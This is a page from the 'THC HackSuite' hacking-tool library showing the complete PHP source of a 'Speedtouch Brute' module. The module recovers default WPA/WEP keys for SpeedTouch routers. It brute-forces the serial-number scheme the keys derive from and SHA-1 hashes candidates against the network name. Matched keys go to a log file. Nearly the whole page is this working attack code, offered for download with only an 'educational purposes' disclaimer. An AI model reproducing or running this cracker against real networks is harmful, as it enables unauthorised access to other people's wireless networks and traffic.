THC HackSuite File Library

random gallery image

random tutorial

preview

..cool, we will make a new module and not just some new module, nope let's make a fully automatic injection script! This tutorial is the first step into making this. Let's first explain..

random vulnerability assesment

THC AntiEvil

Attempts to find suspicious and evil files or code

more about this module
more of this category
more modules

HackSuite File Library

Here you can find the latest files and structure of the THC HackSuite, note that if you have an earlier version of the suite it's not recommended to update files manually. Instead you should overwrite your existing HackSuite environment.


<?php

/*

Handler for Speedtouch Brute



Author: Remco Kouw

Site: http://www.hacksuite.com

Last Edit: 13-04-2015

*/

// set variable to be able to save a task

$_MODULE_C = "thc_sb";

// log file for wpa/wep keys

$_LOG = "keys.txt";

include_once("../../Includes/screen_header.php");

include_once($_PATHS['style_root']."/screen.php");

include_once($_PATHS['functions_root']."/scrn.php");

// options

$sOptions = "<b>logging:</b> ".($_CONTEXT['log']==true ? "on" : "off")."<br>\n";

$sOptions .= "<b>silence:</b> ".($_CONTEXT['silent']==true ? "on" : "off")."<br>\n";

$sOptions .= "<b>verbose:</b> ".($_CONTEXT['verbose']==true ? "on" : "off")."\n";

if(isset($_POST['submit'])){

    switch($_POST['submit']){

        // attempt to bruteforce default wpa key

        case"Bruteforce":

        include_once("../../Includes/task_start.php");

        echo $sOut;

        break;

        // dump of cracked keys

        case"Dump File":

        echo $sOut;

        if(!function_exists("RawToArray")){

            include_once($_PATHS['functions_root']."/raw_to_array.php");

        }

        if(false==($aKeys = RawToArray($_LOG))){

            echo"<b id=h7>[no keys found yet]</b>";

        }

        else{

            for($x=0;$x<count($aKeys);$x++){

                echo"<b>".date($_CONTEXT['time_pattern'].' H:i:s',$aKeys[$x][0])."</b> possible WPA or WEP key for <b>".$aKeys[$x][1]."</b> is <b>".$aKeys[$x][2]."</b><br>\n";

            }

        }

        echo $sEnd;

        exit;

        break;

        // clean logfile

        case"Truncate Log":

        if(!function_exists("WriteF")){

            $sDest = $_PATHS['functions_root']."/fwrite.php";

            (!IsThere($sDest) ? die("Can only overwrite logs if you have the write function <b>WriteF</b>") : include_once($sDest));

        }

        echo $sOut;

        echo (WriteF($_LOG,"","w")==true ? "Successfully deleted old entries." : "Failed to delete old entries.");

        echo $sEnd;

        exit;

        break;

        // just show index

        default:

        echo $sOut;

        echo $sOptions;

        echo $sEnd;

        exit;

    }

}

else{

    echo $sOut;

    echo $sOptions;

    echo $sEnd;

    exit;

}

echo Screen("<br>\n<b>Running..</b><p>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);

// spit fire...

flush();

ob_flush();

// let's bruteforce the wpa key

$sInput = strtolower(strip_tags($_POST['sInput']));

$iOffset = 40-(strlen($sInput));

$sChars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";

$iChars = strlen($sChars);

// 200.

$aDefaultYears = array(6,7,8);

$aYears = array();

foreach($_POST['aYear'] as $sYear){

    $iYear = str_replace("20","",str_replace("200","",$sYear));

    if(!isset($iYear[0])){

        // just in case u wanna be funny, it's not 2020 yet!

        continue;

    }

    $aYears[] = $iYear;

}

if(0==($iYears = count($aYears))){

    $aYears = $aDefaultYears;

}

$iMatch = 0;

// years

for($x=0;$x<count($aYears);$x++){

    // weeks

    for($y=1;$y<53;$y++){

        echo Screen("[20".(isset($aYears[$x][1]) ? "" : "0").$aYears[$x]."]: week ".$y."<br>",$_CONTEXT['verbose'],$_CONTEXT['silent']);

        flush();

        ob_flush();

        $iCheck = $iMatch;

        // char 1

        for($a=0;$a<$iChars;$a++){

            // char 2

            for($b=0;$b<$iChars;$b++){

                // char 3

                for($c=0;$c<$iChars;$c++){

                    // see if we have a match

                    $sHash = sha1(strtoupper(sprintf("CP%02d%02d%s", $aYears[$x], $y, base_convert(ord($sChars[$a]),10,16).base_convert(ord($sChars[$b]),10,16).base_convert(ord($sChars[$c]),10,16))));

                    if(substr($sHash,$iOffset)==$sInput){

                        echo Screen("<b id=h6>possible wpa/wep key for ".$sInput.":</b> ".substr($sHash,0,10)."<br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);

                        if($_CONTEXT['log']==true){

                            WriteF($_LOG,time()."|".$sInput."|".substr($sHash,0,10)."\n");

                        }

                        $iMatch++;

                    }

                }

            }

        }

        if($iCheck==$iMatch){

            echo Screen("<b id=h7>no keys for this week</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);

        }

    }

}

echo Screen("<b>matches for ".$sInput."</b>: ".$iMatch." (running time) ".(time()-$_CONTEXT['start_task'])."(s)\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);

// update entry in background task file

include_once($_PATHS['includes_root']."/task_end.php");

echo $sEnd;

?>

[ back ]

site stats

cms statistics:

version: 0.6.0
downloads: 3938
native: 26
modules: 21
apps: 2

support development

It takes lots of calories in order to create new things for the hacksuite, so it would be grand if you could buy me a protein shake or extra energy to keep me going. Thanks!

disclaimer

We are not responsible for any direct or indirect damage caused by abusing the tools provided on hacksuite.com. The suite is developed for educational purposes, use at your own risk!

site resources

remote resources

partners and friends

Created by Remco Kouw. Powered by protein shakes and a high calorie diet.